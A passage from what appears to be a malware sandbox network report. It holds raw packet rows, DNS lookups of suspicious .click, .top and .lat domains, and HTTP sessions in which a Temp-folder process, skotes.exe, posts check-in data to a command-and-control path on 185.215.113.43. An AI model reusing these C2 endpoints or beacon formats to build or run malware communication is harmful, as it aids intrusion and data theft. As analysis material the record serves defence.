                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.157088995 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.157107115 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.157119036 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.157372952 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.157409906 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.157744884 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.157787085 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.157866001 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.157882929 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.157908916 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.157919884 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.158133984 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.158176899 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.158575058 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.158617973 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.158715010 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.158731937 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.158755064 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.158766985 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.158972979 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.159012079 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.183788061 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.183840990 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.183964014 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.183979988 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.184005022 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.184016943 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.184106112 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.184144020 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.184282064 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.184298992 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.184324980 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.184335947 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.184550047 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.184590101 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.184776068 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.184817076 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.222990036 CET8049890212.193.31.8192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.332500935 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.332568884 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.332715034 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.332732916 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.332782030 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.332782030 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.332818031 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.332834959 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.332849979 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.332855940 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.332875967 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.332899094 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.333343983 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.333460093 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.333476067 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.333501101 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.333524942 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.333715916 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.333924055 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.334125042 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.334172010 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.334230900 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.334248066 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.334274054 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.334286928 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.334516048 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.334558964 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.334832907 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.334875107 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.334916115 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.334959984 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.335089922 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.335107088 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.335136890 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.335148096 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.335376024 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.335422039 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.335489988 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.335506916 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.335535049 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.335546017 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.335783005 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.335829020 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.336179018 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.336224079 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.336328983 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.336345911 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.336373091 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.336384058 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.336561918 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.336605072 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.336956978 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.337001085 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.337075949 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.337091923 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.337115049 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.337126970 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.337352991 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.337394953 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.337732077 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.337785959 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.337863922 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.337882042 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.337905884 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.337917089 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.338140965 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.338187933 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.338553905 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.338599920 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.338665009 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.338681936 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.338706970 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.338721037 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.338962078 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.338999987 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.339319944 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.339396000 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.339441061 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.339458942 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.339483023 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.339495897 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.339728117 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.339771032 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.340106010 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.340152025 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.340212107 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.340229034 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.340255976 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.340267897 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.340502024 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.340547085 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.340888977 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.340939999 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.549091101 CET192.168.2.41.1.1.10x89e5Standard query (0)pancakedipyps.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.162172079 CET192.168.2.41.1.1.10x460bStandard query (0)cheapptaxysu.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:48.390669107 CET192.168.2.41.1.1.10x89c5Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.563082933 CET192.168.2.41.1.1.10x4272Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:57.035006046 CET192.168.2.41.1.1.10x2ff7Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:59.012953997 CET192.168.2.41.1.1.10x5ed6Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:00.674660921 CET192.168.2.41.1.1.10x3d19Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:00.675098896 CET192.168.2.41.1.1.10x4dbeStandard query (0)httpbin.org28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:06.876049995 CET192.168.2.41.1.1.10x70eeStandard query (0)home.fivetk5sb.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:06.876180887 CET192.168.2.41.1.1.10x7176Standard query (0)home.fivetk5sb.top28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:12.273668051 CET192.168.2.41.1.1.10xf20eStandard query (0)home.fivetk5sb.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:12.273794889 CET192.168.2.41.1.1.10x668cStandard query (0)home.fivetk5sb.top28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:36.725620031 CET192.168.2.41.1.1.10x2384Standard query (0)fivetk5sb.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:36.725728035 CET192.168.2.41.1.1.10x13dStandard query (0)fivetk5sb.top28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:40.033937931 CET192.168.2.41.1.1.10x2f6eStandard query (0)fivetk5sb.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:40.033998966 CET192.168.2.41.1.1.10x9cb7Standard query (0)fivetk5sb.top28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:47.950272083 CET192.168.2.41.1.1.10x32fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:47.951442957 CET192.168.2.41.1.1.10x54ccStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:50.734246969 CET192.168.2.41.1.1.10x710fStandard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:51.632272959 CET192.168.2.41.1.1.10x90f8Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:52.164628029 CET192.168.2.41.1.1.10x54f5Standard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:08.174432039 CET192.168.2.41.1.1.10x544bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:08.174550056 CET192.168.2.41.1.1.10xbeddStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:09.608649969 CET192.168.2.41.1.1.10xf7c0Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:09.812504053 CET192.168.2.41.1.1.10x8c9cStandard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:22.492811918 CET192.168.2.41.1.1.10xe436Standard query (0)fivetk5sb.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:22.492923021 CET192.168.2.41.1.1.10x8ac3Standard query (0)fivetk5sb.top28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:22.633333921 CET192.168.2.41.1.1.10xe436Standard query (0)fivetk5sb.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:23.435331106 CET192.168.2.41.1.1.10x75c6Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:23.435331106 CET192.168.2.41.1.1.10x5867Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:25.423273087 CET192.168.2.41.1.1.10x8391Standard query (0)home.fivetk5sb.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:25.426515102 CET192.168.2.41.1.1.10xf0a4Standard query (0)home.fivetk5sb.top28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:25.426580906 CET192.168.2.41.1.1.10x8391Standard query (0)home.fivetk5sb.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:25.743284941 CET192.168.2.41.1.1.10xdbb7Standard query (0)home.fivetk5sb.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:25.743391037 CET192.168.2.41.1.1.10xdfc1Standard query (0)home.fivetk5sb.top28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:26.011066914 CET192.168.2.41.1.1.10xf2c7Standard query (0)home.fivetk5sb.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:26.011190891 CET192.168.2.41.1.1.10xf6b1Standard query (0)home.fivetk5sb.top28IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:42.555706978 CET192.168.2.41.1.1.10x6522Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:42.810885906 CET192.168.2.41.1.1.10x93c4Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:45.266242981 CET192.168.2.41.1.1.10xd7d2Standard query (0)fieldhitty.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.859587908 CET1.1.1.1192.168.2.40x89e5No error (0)pancakedipyps.click172.67.209.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.859587908 CET1.1.1.1192.168.2.40x89e5No error (0)pancakedipyps.click104.21.23.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.494499922 CET1.1.1.1192.168.2.40x460bNo error (0)cheapptaxysu.click104.21.67.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.494499922 CET1.1.1.1192.168.2.40x460bNo error (0)cheapptaxysu.click172.67.177.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:48.528287888 CET1.1.1.1192.168.2.40x89c5No error (0)drive.google.com216.58.208.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.699871063 CET1.1.1.1192.168.2.40x4272No error (0)drive.usercontent.google.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:57.172583103 CET1.1.1.1192.168.2.40x2ff7No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:59.150551081 CET1.1.1.1192.168.2.40x5ed6No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:00.961848021 CET1.1.1.1192.168.2.40x3d19No error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:00.961848021 CET1.1.1.1192.168.2.40x3d19No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:07.615792990 CET1.1.1.1192.168.2.40x70eeNo error (0)home.fivetk5sb.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:12.411756039 CET1.1.1.1192.168.2.40xf20eNo error (0)home.fivetk5sb.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:37.118926048 CET1.1.1.1192.168.2.40x2384No error (0)fivetk5sb.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:40.173645020 CET1.1.1.1192.168.2.40x2f6eNo error (0)fivetk5sb.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:48.086967945 CET1.1.1.1192.168.2.40x32fNo error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:48.087941885 CET1.1.1.1192.168.2.40x54ccNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:50.959641933 CET1.1.1.1192.168.2.40x710fName error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:52.095386028 CET1.1.1.1192.168.2.40x90f8Name error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:52.472418070 CET1.1.1.1192.168.2.40x54f5No error (0)discokeyus.lat104.21.21.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:52.472418070 CET1.1.1.1192.168.2.40x54f5No error (0)discokeyus.lat172.67.197.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:08.311718941 CET1.1.1.1192.168.2.40xbeddNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:08.311846018 CET1.1.1.1192.168.2.40x544bNo error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:09.745467901 CET1.1.1.1192.168.2.40xf7c0Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:09.951248884 CET1.1.1.1192.168.2.40x8c9cName error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:22.634551048 CET1.1.1.1192.168.2.40xe436No error (0)fivetk5sb.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:22.772747993 CET1.1.1.1192.168.2.40xe436No error (0)fivetk5sb.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:23.572068930 CET1.1.1.1192.168.2.40x75c6No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:23.572103024 CET1.1.1.1192.168.2.40x5867No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:25.591751099 CET1.1.1.1192.168.2.40x8391No error (0)home.fivetk5sb.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:25.591842890 CET1.1.1.1192.168.2.40x8391No error (0)home.fivetk5sb.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:25.881067991 CET1.1.1.1192.168.2.40xdbb7No error (0)home.fivetk5sb.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:26.148940086 CET1.1.1.1192.168.2.40xf2c7No error (0)home.fivetk5sb.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:42.693589926 CET1.1.1.1192.168.2.40x6522Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:42.952872038 CET1.1.1.1192.168.2.40x93c4Name error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:45.577824116 CET1.1.1.1192.168.2.40xd7d2No error (0)fieldhitty.click104.21.89.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:45.577824116 CET1.1.1.1192.168.2.40xd7d2No error (0)fieldhitty.click172.67.141.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              0192.168.2.449753185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:06.006340981 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:07.338330030 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:07 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              1192.168.2.449759185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:08.962471008 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
